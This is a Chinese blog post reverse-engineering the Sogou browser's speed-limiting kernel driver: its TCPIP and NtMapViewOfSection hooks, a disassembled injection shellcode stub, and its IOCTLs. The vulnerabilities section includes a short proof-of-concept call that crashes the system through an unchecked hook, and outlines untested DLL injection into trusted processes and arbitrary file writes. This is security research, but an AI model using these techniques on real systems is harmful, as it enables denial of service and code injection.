搜狗浏览器网速保护 功能/漏洞/缺陷 分析

最新推荐文章于 2024-04-18 10:09:07 发布
最新推荐文章于 2024-04-18 10:09:07 发布
阅读量1.9k 收藏
点赞数
分类专栏: 内核研究 rootkit 文章标签: 浏览器 搜狗 hook 数据结构 解密 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shevacoming/article/details/7594056
版权

软件版本 2.2.0.1423
驱动版本 1.0.0.9

主要功能就是对耗流量的下载软件进行限速

★.r0 挂钩TCPIP的handler 拦截发送包
★.r0 hook NtMapViewOfSection 加载mswsock.dll时向r3中注入sogouipfilter.dll,将WSPStartup EAT hook至一段shellcode , 然后加载sogouipfilter!WSPStartup2 并在WSPStartup2函数中
挂钩lpProcTable 的发送和接收参数

如果找不到netopt.se的名单文件,默认注入的进程名单是
ThunderService.exe thunder5.exe qqdownload.exe bitcomet.exe utorrent.exe btdownloadgui.exe bitspirit.exe emule.exe edonkey2000.exe vagaa.exe
pplive.exe ppstream.exe qvodterminal.exe

下面是shellcode内容

017F0000 > 56              push    esi
017F0001    BE 3A007F01     mov     esi, 17F003A
017F0006    8B46 08         mov     eax, dword ptr [esi+8] ;0100dc80 WSPStartup2的地址
017F0009    85C0            test    eax, eax
017F000B    75 1F           jnz     short 017F002C
017F000D    8D46 20         lea     eax, dword ptr [esi+20]
017F0010    50              push    eax ;sogouip 路径
017F0011    FF16            call    dword ptr [esi] ;LoadLibraryA "sogouip"
017F0013    85C0            test    eax, eax
017F0015    74 0C           je      short 017F0023
017F0017    8D4E 10         lea     ecx, dword ptr [esi+10] ;"WSPStartup2"
017F001A    51              push    ecx
017F001B    50              push    eax
017F001C    FF56 04         call    dword ptr [esi+4] ;GetProcAddress
017F001F    85C0            test    eax, eax
017F0021    75 06           jnz     short 017F0029
017F0023    8B4E 0C         mov     ecx, dword ptr [esi+C]
017F0026    5E              pop     esi
017F0027    FFE1            jmp     ecx
017F0029    8946 08         mov     dword ptr [esi+8], eax
017F002C    8B4E 0C         mov     ecx, dword ptr [esi+C]
017F002F    5E              pop     esi
017F0030    5A              pop     edx
017F0031    51              push    ecx   ;原地址? 719cc29b
017F0032    52              push    edx
017F0033    FFE0            jmp     eax

;17F003A开始的数据结构
;LoadLibraryA addr
;GetProcAddress addr
;WSPStartup2地址   另外一个数据表中存放的是WSPStartup3地址 相应的下面也是WSPStartup3的名字
;mswsock.dll!WSPStartup
;"WSPStartup2"
;"sogouip.dll" path

★.DeviceIoCtrl中的功能,具体功能码请到IDA中自己看
1.shellcode 从WSPStartup2切换到WSPStartup3

2.拷贝一个文件到sogou的安装目录下

3. r3传入;LoadLibraryA addr;GetProcAddress addr;WSPStartup2地址;mswsock.dll!WSPStartup地址 这个过程也可以在ssdt hook中完成

4.Recv Set TCPInfo to drop

★.漏洞和缺陷

1.ssdt hook 对参数毫无过滤,导致bsod

.text:00013152                 mov     esi, [ebp+BaseAddress] ;BaseAddress存入esi
.text:00013155                 push    [ebp+InheritDisposition]
.text:00013158                 mov     ecx, [ebp+ProcessHandle]
.text:0001315B                 mov     ebx, [ebp+SectionHandle]
.text:0001315E                 mov     eax, [ebp+OriginFunc]
.text:00013161                 mov     [ebp+var_1A4], edi
.text:00013167                 push    [ebp+var_1A4]
.text:0001316D                 xor     edi, edi
.text:0001316F                 push    edx
.text:00013170                 push    [ebp+CommitSize]
.text:00013173                 mov     [ebp+Object], edi
.text:00013179                 push    [ebp+ZeroBits]
.text:0001317C                 mov     [ebp+var_1B4], edi
.text:00013182                 push    esi
.text:00013183                 push    ecx
.text:00013184                 push    ebx
.text:00013185                 mov     [ebp+mdl], edi
.text:0001318B                 call    eax          ;调用原函数
.text:0001318D                 cmp     eax, edi
.text:0001318F                 mov     esi, [esi]   ;毫无判断,BSOD

比如构造如下代码

HMODULE hdll = LoadLibrary(L"ntdll");

ULONG addr = (ULONG)GetProcAddress(hdll,(LPCSTR)"NtMapViewOfSection");
_asm
{
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   call addr;
}

2.通过修改改注册表和下发ioctrl,可以替换注入的dll,实现注入,注入到受信进程里,想干啥干啥(注入名单文件是加密的 要解密 解密函数详见IDB)

3.通过修改改注册表,可以向任意目录写入文件,绕过一些保护

后两个内容没有实践~但从分析上看,只要满足一些条件,应该是可行的~具体看IDB吧~他程序里的判断都很好绕过..........

IDB和一些相关资料:点击下载


Shevacoming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NtUnmapViewOfSection
08-21
NtUnmapViewOfSection演示程序
学习内核注射DLL到用户态进程空间
ccx_john的专栏
10-18 1163
/* InjectEye的功能是:当系统中有进程加载urlmon.dll时,注射功能代码到该进程中,修改urlmon.dll!DllMain头部的5个字节数据使之跳转到我们的功能代码中,抢先执行,即注射mxEye.dll到该进程中。 */ /* FileName:    InjectEye.h Author:    ejoyc Data    :    [03/05/2010]
进程注入系列Part 1 常见的进程注入手段
最新发布
蛇矛实验室
04-18 1042
进程注入是一种众所周知的技术,恶意程序利用它在进程的内存中插入并执行代码。进程注入是一种恶意程序广泛使用的防御规避技术。大多数情况下,恶意程序使用进程注入来动态运行代码,这意味着实际的恶意代码不需要直接写入磁盘上的文件中,以避免被防病毒软件的静态检测所发现。简单来说,进程注入就是将一段数据从一个进程传输到另一个进程的方法,这种注入过程可以发生在执行操作的同一进程(自注入)上,也可发生在外部进程上。
[注入] - NtMapViewOfSection
墨鱼菜鸡
08-20 473
背景 新的注入方式:利用一个未公开函数 NtMapViewOfSection 在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的...
在NT中直接访问物理内存
11-13 3543
P.bhw98{ PADDING-RIGHT: 0px; PADDING-LEFT: 0px; FONT-SIZE: 9pt; PADDING-BOTTOM: 0px; MARGIN: 10px 0px 5px; LINE-HEIGHT: normal; PADDING-TOP: 0px; FONT-FAMIL
浏览器 v10.0.0.32351官方版
11-13
此外,浏览器的广告拦截功能,有效降低了恶意广告对用户体验的影响,增强了安全性。 在用户体验层面,浏览器的拼音输入法和五笔输入法的无缝集成,为用户提供了便捷的输入体验。拼音输入法支持词组联想和...
浏览器老版本.apk
03-09
浏览器老版本
浏览器7.0页面特效下载
06-24
浏览器7.0的宣传页面中,全屏动画可能用于展示浏览器的新特性、功能或设计亮点,通过动态的画面吸引用户的注意力,增加品牌印象。 至于"浏览器",作为中国知名的浏览器,它提供了快、安全的上...
浏览器定时抢票功能怎么使用.docx
09-27
浏览器定时抢票功能使用指南 浏览器定时抢票功能是一款实用的工具,旨在帮助用户抢票 succeed。为此,我们将详细介绍浏览器定时抢票功能的使用方法。 安装浏览器抢票插件 -------------------...
一点浏览器 一点浏览器 v3.0.1009
11-11
此外,一点浏览器还可能集成了一些实用的功能,如智能索、广告拦截、隐私保护等,以满足不同用户的个性化需求。 在安全性方面,作为知名互联公司,其产品通常会具备一定的安全防护能力。一点浏览器可能...
Hook NtCreateSection的SSDT实现
10-29
这个我学习天书夜读后的大作业。尽管SSDT没有前途了,不过还是可以玩玩的
NtMapViewOfSection注入
weixin_30800987的博客
07-29 365
新的注入方式:利用一个未公开函数NtMapViewOfSection在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求 #define _WIN32_WINNT 0x0400 #include <windows.h> typedef LONG NTSTATUS, *PN...
自己做一个的络防火墙(二):实现SPI的HOOK函数
weixin_42559271的博客
04-21 892
系列文章目录 环境搭建:https://blog.csdn.net/weixin_42559271/article/details/115803399 文章目录系列文章目录一、前言二、背景知识2.1 Winsock架构体系2.2 防火墙所在位置三、SPI函数的编写3.1 微软对于SPI的编写约定3.2 HOOK函数的编写思路3.3 WSPStartup函数编写思路 一、前言 之前的一篇文章我们详细的介绍了如何将我们的环境搭建起来,前文提到我们的项目由两部分组成,这一篇文章就来讲解一下其中的HOOK的DL
读《毛德操:关于进程挂靠》
Netfilter
02-09 5509
WINDOWS 可以创建远程线程,但是linux却不可以,为何?windows是基于对象的,是异步的,在很多情况下都没有进程上下文,试想一下,windows实际 上就像一个超大容器,里面有形形色色各种对象,进程是对象,线程是对象,中断也是对象,文件是对象...,内核管理着这些对象,通过管理它们为用户提供服 务,而如果对象不交互就不需要管理,系统也就没有存在的意义了,实际上系统基于对象实现就是为了提
漫谈兼容内核之十三:关于“进程挂靠”
周寅的专栏
03-13 2002
     上一篇漫谈在介绍APC机制时提到:线程在Windows内核中运行时有时候需要暂时“挂靠(Attach)”到别的进程的用户空间,即暂时切换到另一个进程的用户空间。这称为“进程挂靠”,因为用户空间是一个进程最主要的特征。    显然,要是当前线程的操作与用户空间无关、不需要访问用户空间,那么当时的用户空间到底是谁的用户空间根本就无关紧要,所以这必定发生在与用户空间有关的操作中。    一般而
APT视频教程
12-13
这套课程主要给大家讲解什么是APT,APT是如何攻击的,国外有哪些组织用一般用的什么手段,内容涉及到APT攻击模拟,样本分析,流量分析,特征提取。
内核 HOOK ZwMapViewOfSection
残酷な天使
10-06 3669
转自:http://lwglucky.blog.51cto.com/1228348/284829  有部分模块加载时会调用ZwMapViewOfSection,比如进程创建时映射N份DLL到自己的虚拟空间中去.我们替换SSDT中的这个函数,过滤出是加载Kernel32.
ubuntu安装浏览器
09-28
安装浏览器的步骤如下: 1. 首先,你需要下载浏览器的deb安装包。你可以从官方站或其他可靠的下载源获取deb安装包。 2. 打开终端,并使用以下命令切换到下载目录: cd /path/to/download/directory 替换...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值